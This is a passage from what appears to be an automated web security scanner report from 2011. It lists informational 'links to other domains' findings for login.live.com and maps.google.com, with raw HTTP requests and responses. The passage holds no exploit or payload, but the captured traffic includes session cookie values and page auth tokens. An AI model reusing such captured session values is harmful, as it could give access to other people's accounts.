<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660834&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.msn.com%2Fweather.aspx%3FGT1%3D24000&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=February+2&mkt=en-us&FORM=MSNLEC">Wednesday, Feb. 02, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomemsn.com/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&order=distance&FORM=MSNLEC">Government & community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC">Hotels & motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75207&order=distance&FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&order=distance&FORM=MSNLEC">Sports & recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75207">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75207">Yellow pages</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/today?q=Dallas+TX+weather&unit=F&Form=MSNLAP">Find Maps and average temperatures</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/weather/forecast?q=Dallas+TX+weather&unit=F&Form=MSNLAP">Compare forecasts from multiple weather providers</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&resize=false">Feedback</a>
...[SNIP]...

17.139. http://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://login.live.com
Path:	/login.srf

Issue detail

The page was loaded from a URL containing a query string:

http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1253879194&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1033&id=64855&mkt=en-us

The response contains the following links to other domains:

http://img.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/images/Windows_Live_v_thumb.jpg
http://js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js
http://js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/WLWorkflow.js

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1253879194&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1033&id=64855&mkt=en-us HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:34:00 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1O23 V: 0
Content-Type: text/html; charset=utf-8
Expires: Wed, 02 Feb 2011 15:33:00 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: vv=900; HTTPOnly= ; domain=login.live.com;path=/
Set-Cookie: MSPRequ=lt=1296660840&co=1&id=64855; path=/;version=1
Set-Cookie: MSPOK=$uuid-c8c3f595-9f80-423b-bbf3-63ac5364ac49; path=/;version=1
X-Frame-Options: deny
Content-Length: 13847



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
</script><link rel="image_src" href="http://Img.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/images/Windows_Live_v_thumb.jpg" / >
<script type="text/javascript">
...[SNIP]...
</script><script type="text/javascript" src="http://Js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js"></script>
<script type="text/javascript" src="http://Js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/WLWorkflow.js"></script>
...[SNIP]...

17.140. https://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/login.srf

Issue detail

The page was loaded from a URL containing a query string:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296573765&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fwww.msn.com%2F&lc=1033&id=1184

The response contains the following link to another domain:

https://secure.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/css/R3WinLive1033.css

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 16:32:17 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1P39 V: 0
Content-Type: text/html; charset=utf-8
Expires: Wed, 02 Feb 2011 16:31:17 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: vv=900; HTTPOnly= ; domain=login.live.com;path=/
Set-Cookie: MSPRequ=lt=1296664337&co=1&id=1184; path=/;version=1
Set-Cookie: MSPOK=$uuid-45b9937e-ea5c-462d-94c7-90155efe4e1c; path=/;version=1
X-Frame-Options: deny
Content-Length: 12719



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
</script>
<link rel="stylesheet" title="R3CSS" type="text/css" href="https://secure.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/css/R3WinLive1033.css"/><style type="text/css">
...[SNIP]...

17.141. https://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/login.srf

Issue detail

The page was loaded from a URL containing a query string:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296573765&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fwww.msn.com%2F&lc=1033&id=1184

The response contains the following link to another domain:

https://secure.wlxrs.com/~Live.SiteContent.ID/~16.0.2/~/~/~/~/css/R3WinLive1033.css

Request

Response

17.142. http://maps.google.com/local_url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/local_url

Issue detail

The page was loaded from a URL containing a query string:

http://maps.google.com/local_url?q=http://www.adobe.com/shockwave/download/download.cgi%3FP1_Prod_Version%3DShockwaveFlash&dq=&file=api&v=2&client=gme-orbitz&async=2&sensor=false&callback=GoogleMapAPILoader.callback&hl=en&s=ANYYN7manSNIV_th6k0SFvGB4jz36is1Gg

The response contains the following link to another domain:

http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash

Request

GET /local_url?q=http://www.adobe.com/shockwave/download/download.cgi%3FP1_Prod_Version%3DShockwaveFlash&dq=&file=api&v=2&client=gme-orbitz&async=2&sensor=false&callback=GoogleMapAPILoader.callback&hl=en&s=ANYYN7manSNIV_th6k0SFvGB4jz36is1Gg HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=pmnSJWiZwGth09kNohAMwJvIpkIdJSJlqyMqx-omPXiSQSzkkNSHqGwv9A9J-zJ5JWsywblLTMJRa23z5AiuJrUbUWrTlS9i8IOD2l1hjJpMR5EY4CTSxmfm-gxCfk12; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 302 Found
Location: http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 02 Feb 2011 15:34:26 GMT
Server: mfe
Content-Length: 280
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash">here</A>
...[SNIP]...

17.143. http://maps.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps

Issue detail

The page was loaded from a URL containing a query string:

http://maps.google.com/maps?um=1&ie=UTF-8&q=millenium+boston&fb=1&gl=us&hq=millenium&hnear=Boston,+MA&ei=_CVITc2VBYOClAeFy82iBA&sa=X&oi=local_group&ct=image&resnum=4&ved=0CBYQtgMwAw

The response contains the following links to other domains:

http://maps.gstatic.com/intl/en_us/mapfiles/adicon_w.png
http://maps.gstatic.com/intl/en_us/mapfiles/admarker.png
http://maps.gstatic.com/intl/en_us/mapfiles/admarker_shadow.png
http://maps.gstatic.com/intl/en_us/mapfiles/red_markers_A_J2.png
http://maps.gstatic.com/intl/en_us/mapfiles/shadow50.png
http://maps.gstatic.com/intl/en_us/mapfiles/textad_icon.png
http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png
http://maps.gstatic.com/mapfiles/gw_link.png
http://maps.gstatic.com/mapfiles/mapcontrols3d5.png
http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif
http://maps.gstatic.com/mapfiles/placepage/icon-help.png
http://maps.gstatic.com/mapfiles/transparent.png
http://pagead2.googlesyndication.com/pagead/imgad?id=CPWQ1cSPg87XTxAQGBAoATIIqbcvGKQlMhQ
http://static.panoramio.com/photos/iw-thumbnail/5525436.jpg
http://www.youtube.com/results?um=1&ie=UTF-8&q=millenium+boston&fb=1&gl=us&resnum=4&sa=N&hl=en&tab=l1

Request

GET /maps?um=1&ie=UTF-8&q=millenium+boston&fb=1&gl=us&hq=millenium&hnear=Boston,+MA&ei=_CVITc2VBYOClAeFy82iBA&sa=X&oi=local_group&ct=image&resnum=4&ved=0CBYQtgMwAw HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=pmnSJWiZwGth09kNohAMwJvIpkIdJSJlqyMqx-omPXiSQSzkkNSHqGwv9A9J-zJ5JWsywblLTMJRa23z5AiuJrUbUWrTlS9i8IOD2l1hjJpMR5EY4CTSxmfm-gxCfk12; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:34:11 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...
</div><a href="http://www.youtube.com/results?um=1&ie=UTF-8&q=millenium+boston&fb=1&gl=us&resnum=4&sa=N&hl=en&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" title="Google Maps Labs" id="ml_flask_img" class="flask"/> <span id="ml_flask_msg">
...[SNIP]...
<td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="280" height="1" alt=""/> </td> <td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="220" height="1" alt=""/> </td>
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="panel-bar-divider bar-divider"/> </span>
...[SNIP]...
<a style="display:none" jsdisplay="topbar_config.show_lbc_badge" jsvalues="href: topbar_config.lbc_badge_url"> <img src="http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif" alt=""/> <span msgid="13425" class="link-text">
...[SNIP]...
<a style="display:" jsvalues="style.display: topbar_config.show_panel_toggler ? '' : 'none';" id="paneltoggle2" href="javascript:void(0)" log="paneltgl"> <img title="Hide panel" useattr="title:#msg_hide_panel" id="panelarrow2" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a> <a style="display:none" href="" jsvalues="style.display: topbar_config.show_return_arrow ? '' : 'none'; href: topbar_config.return_arrow_url" id="return-to-mapview" onclick="return loadUrl(this.href)"> <img title="Map View" useattr="title:#msg_map_view" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a>
...[SNIP]...
<a href="javascript:void(0)" id="view_rss_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-rss"/> <span msgid="11196" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span>
...[SNIP]...
<a href="javascript:void(0)" id="view_kml_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-kml"/> <span msgid="11754" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span> <a style="display:none" href="javascript:void(0)" id="mapmaker-link" jsaction="rmi.open-mapmaker"> <img class="bar-icon" src="http://maps.gstatic.com/mapfiles/gw_link.png"/> <span msgid="13326" class="link-text">
...[SNIP]...
</a> <img style="display:none" id="mapmaker-link-sep" src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="print.show" id="print"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-print2"/> <span msgid="10044" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a id="showsendtox" href="javascript:void(0);" jsaction="stx.show"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-email2"/> <span msgid="11023" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="link.show" id="link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-link2"/> <span msgid="12145" class="link-text">
...[SNIP]...
</div> <img style="left:147px;top:-189px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_us/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:114px;top:-140px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_us/mapfile
...[SNIP]...
</div> <img style="left:114px;top:-140px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_us/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:120px;top:-146px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_us/mapfile
...[SNIP]...
</div> <img style="left:120px;top:-146px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_us/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:207px;top:-99px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_us/mapfiles
...[SNIP]...
</div> <img style="left:207px;top:-99px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_us/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:-226px;top:120px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_us/mapfile
...[SNIP]...
</div> <img style="left:-226px;top:120px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_us/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:21px;top:-188px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_us/mapfiles
...[SNIP]...
</div> <img style="left:21px;top:-188px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_us/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:120px;top:-156px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_us/mapfile
...[SNIP]...
</div> <img style="left:120px;top:-156px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_us/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:23px;top:-9px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_us/mapfiles/s
...[SNIP]...
</div> <img style="left:23px;top:-9px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_us/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:132px;top:-238px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_us/mapfile
...[SNIP]...
</div> <img style="left:132px;top:-238px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_us/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:124px;top:-160px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_us/mapfile
...[SNIP]...
</div> <img style="left:124px;top:-160px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_us/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="admarker_shadow" style="left:130px;top:-178px;width:34px;height:24px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_us/
...[SNIP]...
</div> <img style="left:130px;top:-178px;width:34px;height:24px" src="http://maps.gstatic.com/intl/en_us/mapfiles/admarker_shadow.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:0px" src="http://maps.gstatic.com/intl/en_us/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-34px" src="http://maps.gstatic.com/intl/en_us/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-68px" src="http://maps.gstatic.com/intl/en_us/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-102px" src="http://maps.gstatic.com/intl/en_us/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-136px" src="http://maps.gstatic.com/intl/en_us/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-170px" src="http://maps.gstatic.com/intl/en_us/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-204px" src="http://maps.gstatic.com/intl/en_us/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-238px" src="http://maps.gstatic.com/intl/en_us/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-272px" src="http://maps.gstatic.com/intl/en_us/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-306px" src="http://maps.gstatic.com/intl/en_us/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img src="http://maps.gstatic.com/intl/en_us/mapfiles/admarker.png" class="hide-msie-6"/> <img src="http://pagead2.googlesyndication.com/pagead/imgad?id=CPWQ1cSPg87XTxAQGBAoATIIqbcvGKQlMhQ" class="lbalogo_inline hide-msie-6"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> <div style="width:20px" id="pan_up_inline" jsaction="flmc.selectPanUp" class="flmcpanup clickable">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img id="zoom_out_inline_img" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img style="width:114px" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</span> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="mv-dropdown"/> </div>
...[SNIP]...
<div id="overview-toggle"><img id="overview-toggle-image" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png" jsaction="overview.toggle"/> </div>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div style="visibility:" class="dir-tm" id="travel_modes_div"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="dir-tm-sides"/><a jsselect="travelModes" jsvalues=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsvalues="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...
<div class="marker" log="miw" id="marker_top1_2" onclick="return openLbaInfoWindow('top1','maps_panel_marker_bubble_open')"><img class="pushpin" src="http://maps.gstatic.com/intl/en_us/mapfiles/adicon_w.png"/><img class="mp label" src="http://pagead2.googlesyndication.com/pagead/imgad?id=CPWQ1cSPg87XTxAQGBAoATIIqbcvGKQlMhQ"/></div>
...[SNIP]...
<span> <img class="hotel-price-clickable" src="http://maps.gstatic.com/mapfiles/placepage/icon-help.png" jsaction="mouseover:hp.onHelpMouseOver; mouseout:hp.onHelpMouseOut; click:hp.onHelpClick"/> <div id="hp-help-tooltip" class="hotel-price-help-tooltip">
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'A'" jstrack="cnlJTYG9Lpi2ywS5oYHHDQ" ved=0CFQQ_gswAA id="marker_A_2"><img alt="A" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconA"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_7792436457638736636" jsaction="si.togglePanelStarring" jsprops="markerid:'A';b_s:2" data-authtoken="94e8ebb4:XU83U5MkeyLqmAA9-Ghe4gexuiQ" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'B'" jstrack="cnlJTYG9Lpi2ywS5oYHHDQ" ved=0CGoQ_gswAQ id="marker_B_2"><img alt="B" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconB"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_17132826041081042467" jsaction="si.togglePanelStarring" jsprops="markerid:'B';b_s:2" data-authtoken="1310815c:MFIa_rml-s5bZ-ZGLGTR1buDoZA" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'C'" jstrack="cnlJTYG9Lpi2ywS5oYHHDQ" ved=0CHYQ_gswAg id="marker_C_2"><img alt="C" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconC"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_6814180606148787068" jsaction="si.togglePanelStarring" jsprops="markerid:'C';b_s:2" data-authtoken="b9acd19f:kfm7MD9TIfnX213MIDm2HOSf1Ik" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'D'" jstrack="cnlJTYG9Lpi2ywS5oYHHDQ" ved=0CIEBEP4LMAM id="marker_D_2"><img alt="D" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconD"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_14399208935720285870" jsaction="si.togglePanelStarring" jsprops="markerid:'D';b_s:2" data-authtoken="b1a843e7:Ujs2SGcT63UKEjvSqj8BrGjdBJk" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'E'" jstrack="cnlJTYG9Lpi2ywS5oYHHDQ" ved=0CIwBEP4LMAQ id="marker_E_2"><img alt="E" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconE"/></div>
...[SNIP]...
